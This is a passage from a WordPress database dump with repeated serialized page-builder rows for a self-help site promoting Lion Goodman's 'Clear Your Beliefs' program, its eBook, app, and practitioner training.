<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1250, 1725, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:625:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8" style="padding:0px;"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -9px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:658:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1252, 1727, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -9px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:658:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1257, 1476, '_edit_lock', '1415845378:2'),
(1259, 1731, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 25px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -9px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:658:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> 